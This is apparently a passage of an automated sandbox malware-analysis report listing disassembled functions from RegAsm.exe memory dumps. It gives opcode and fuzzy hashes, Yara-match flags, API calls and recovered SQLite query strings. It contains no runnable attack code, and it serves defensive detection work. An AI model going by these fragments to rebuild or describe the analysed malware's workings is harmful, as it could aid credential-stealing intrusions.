                                                    • Instruction Fuzzy Hash: ED7115B0A083528FD7108F29D98071BBBE6EF85710F3449ADE9C687301E335E945D7A2
                                                    Function 1FA3D0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: string or blob too big
                                                    • API String ID: 0-2803948771
                                                    • Opcode ID: 528e7ecfadcf3c52c5e43328e7c995fd6d062fb5faad0f27235a27fe997e825a
                                                    • Instruction ID: 9fb4b0e581e8bd51f64af8dcf338c94915c2cf5763a63d741277d8d05e45e06e
                                                    • Opcode Fuzzy Hash: 528e7ecfadcf3c52c5e43328e7c995fd6d062fb5faad0f27235a27fe997e825a
                                                    • Instruction Fuzzy Hash: 7D417B72D0434ACFE7108A38AC5179A7BD6AF51321F140A7CECA5533D2E62EE608C3D2
                                                    Function 1FA355D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • winDelete, xrefs: 1FA3569C
                                                    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1FA356D1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                    • API String ID: 0-1405699761
                                                    • Opcode ID: af45c880441a13887795bb919ad7e61ac8f110d9a71f943ce3b4574aad305d0c
                                                    • Instruction ID: 1c610631cef860c2a35ebf9b6d19b91182aa3e21e52a3243cf3873d454c7d028
                                                    • Opcode Fuzzy Hash: af45c880441a13887795bb919ad7e61ac8f110d9a71f943ce3b4574aad305d0c
                                                    • Instruction Fuzzy Hash: 12316972E042338FDB102A3D9DC88D67759ABC0773F090562EB83C6381E72EE464E691
                                                    Function 1FA3D300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: string or blob too big
                                                    • API String ID: 0-2803948771
                                                    • Opcode ID: 797377d88d5067081eef42c14a3dd5de571a5567dd56f887ff8cf65a3228f108
                                                    • Instruction ID: aa4aaafa68f2766d911c0bfb8fc590fd18cee38b52b959698a07266f1c754ada
                                                    • Opcode Fuzzy Hash: 797377d88d5067081eef42c14a3dd5de571a5567dd56f887ff8cf65a3228f108
                                                    • Instruction Fuzzy Hash: CD315EB6D04358DBD7004924AC517A6B75A9B81326F180299F8556F2C2E37FFD16D3E0
                                                    Function 004101BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004101DC
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 004247F5
                                                      • Part of subcall function 004247E0: __CxxThrowException@8.LIBCMT ref: 0042480A
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 0042481B
                                                      • Part of subcall function 004103F3: std::_Xinvalid_argument.LIBCPMT ref: 0041043A
                                                    • memcpy.MSVCRT ref: 00410283
                                                    Strings
                                                    • invalid string position, xrefs: 004101D7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                    • String ID: invalid string position
                                                    • API String ID: 214693668-1799206989
                                                    • Opcode ID: e86a1713da9c421aad466737e1125156709f9dea92e3b751e974e07c267e572f
                                                    • Instruction ID: e364865db6849b0bbb6bb3712810e3608b22f82cda0164f9b002173d45244cba
                                                    • Opcode Fuzzy Hash: e86a1713da9c421aad466737e1125156709f9dea92e3b751e974e07c267e572f
                                                    • Instruction Fuzzy Hash: E6417E74A0020AEFCB04DF98D585AEEBBB1BB19300F504496E915AB351D774EE81DB98
                                                    Function 1FB1DEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • sqlite_stat1, xrefs: 1FB1DF30
                                                    • SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1FB1DF4F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
                                                    • API String ID: 0-3572622772
                                                    • Opcode ID: f09eeedbd45f40c86b6d91c4134493214f76b6f42b4e951aca71d043bb61b5dc
                                                    • Instruction ID: 9dda8273d75e10574a7a9d83dd7891c9e9ee888b6dda3f82a7de9a4fa9614588
                                                    • Opcode Fuzzy Hash: f09eeedbd45f40c86b6d91c4134493214f76b6f42b4e951aca71d043bb61b5dc
                                                    • Instruction Fuzzy Hash: 2421E175A093425FCB14EF25FC90E6AB3A4EF89620B05466CFC849F251E324FD15CBA1
                                                    Function 1FBB7E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: OsError 0x%lx (%lu)
                                                    • API String ID: 0-3720535092
                                                    • Opcode ID: 1108e57587c4a457785aa3241abe401fee71d8e405e37933b17a9e093e9502a0
                                                    • Instruction ID: 3e30d8f2a5c9b1b4b6e7a17362da946bbcb46e8a907ea7927f87b888470e5050
                                                    • Opcode Fuzzy Hash: 1108e57587c4a457785aa3241abe401fee71d8e405e37933b17a9e093e9502a0
                                                    • Instruction Fuzzy Hash: D021B8716082226FEB009B65DC48F9B3799EF04B75F140468FB45D1290EB36E920E792
                                                    Function 004105ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00410606
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 004247F5
                                                      • Part of subcall function 004247E0: __CxxThrowException@8.LIBCMT ref: 0042480A
                                                      • Part of subcall function 004247E0: std::exception::exception.LIBCMT ref: 0042481B
                                                    • memmove.MSVCRT ref: 00410684
                                                    Strings
                                                    • invalid string position, xrefs: 00410601
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                    • String ID: invalid string position
                                                    • API String ID: 1659287814-1799206989
                                                    • Opcode ID: ca6f784b9f1dc02688eb942d85fa377bdabd4c016fd9cf51a78246bb136b3278
                                                    • Instruction ID: ef375003275af770b0712b4c6e0838278ff2cfb2657ed62e1bbbf18f06082776
                                                    • Opcode Fuzzy Hash: ca6f784b9f1dc02688eb942d85fa377bdabd4c016fd9cf51a78246bb136b3278
                                                    • Instruction Fuzzy Hash: DA315F75A0021ADFCB04DF98D5859AEBBB0FF49304F504895E825AB351D374EA90CFA9
                                                    Function 1FA4F740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1FA4F752
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
                                                    • API String ID: 0-2071071404
                                                    • Opcode ID: a62c31283a3110d1cfe1ea9842c821f82faeab4c4e5a0e42e4582f7756589102
                                                    • Instruction ID: ce30e446566f4c721a90586586aff36c7a45a4e2dc2ff21519fbff40cf989d79
                                                    • Opcode Fuzzy Hash: a62c31283a3110d1cfe1ea9842c821f82faeab4c4e5a0e42e4582f7756589102
                                                    • Instruction Fuzzy Hash: 4A11B6B9604212AFE6009629DCCCFA733BDEF40735F540169FA0582240E76EB815D665
                                                    Function 1FA2141F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • GetXStateFeaturesMask, xrefs: 1FC00E34
                                                    • InitializeCriticalSectionEx, xrefs: 1FC00E84
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
                                                    • API String ID: 0-4196971266
                                                    • Opcode ID: 83a815494264c3ee3e2c9d26f842b25d07f319be08ec0f27136f687cc43bc7c3
                                                    • Instruction ID: d4d65a1c0ccbbb063088d6411073c1ca83109ac24ed28774b70578a8161b5a3f
                                                    • Opcode Fuzzy Hash: 83a815494264c3ee3e2c9d26f842b25d07f319be08ec0f27136f687cc43bc7c3
                                                    • Instruction Fuzzy Hash: 65018F3A99023877CB113A968C05ECE3E16EB50BB2F124021FE5D69650DA769861FAE0
                                                    Function 1FA7EFE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SELECT %s WHERE rowid = ?, xrefs: 1FA7F017
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SELECT %s WHERE rowid = ?
                                                    • API String ID: 0-866778640
                                                    • Opcode ID: 33dd642f7dd7cc1a416ad9c0022c304e04ae625840d5478c24cd012746ccfedd
                                                    • Instruction ID: 6c79a9ece63da5b8f288e92f7bfb414dc376634d9f8e893c03924a577a6e1311
                                                    • Opcode Fuzzy Hash: 33dd642f7dd7cc1a416ad9c0022c304e04ae625840d5478c24cd012746ccfedd
                                                    • Instruction Fuzzy Hash: CC11253630134A9BD7204B9AEC80F96F7D8EF41331F10862EF55996640EB7BB4568BB0
                                                    Function 0041694A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 00416562
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 00416578
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 004169C8
                                                    • FindClose.KERNEL32(000000FF), ref: 004169DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseFileNext
                                                    • String ID: &lA
                                                    • API String ID: 2066263336-185775853
                                                    • Opcode ID: a22f9ca606b731aa205301b6281b8203b306ff7b681a0b18546e71969be34a33
                                                    • Instruction ID: 688bb23ed88bf2bf0297b508b2492130fa87cd3a82d2578c2bbd464d38e7d44f
                                                    • Opcode Fuzzy Hash: a22f9ca606b731aa205301b6281b8203b306ff7b681a0b18546e71969be34a33
                                                    • Instruction Fuzzy Hash: F5D09E305410599BDF21DF11EC189E97A7DFB4534DB1151A6A806A5064D774DB819F04
                                                    Function 1FA2B224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$misuse
                                                    • API String ID: 0-2530468415
                                                    • Opcode ID: 28e4b1d2629bb7eeb7d8e54883b520af54f1864c5442004fc5baecd15e4dbcec
                                                    • Instruction ID: 8d9af40d074eb5adb6e262055d914339ba2f9ffa0b252ba9bc8979b74668486c
                                                    • Opcode Fuzzy Hash: 28e4b1d2629bb7eeb7d8e54883b520af54f1864c5442004fc5baecd15e4dbcec
                                                    • Instruction Fuzzy Hash: 2EC022211E0308E2C700AA58AC42CCD37208F90B40F608060AE2818082D31881284262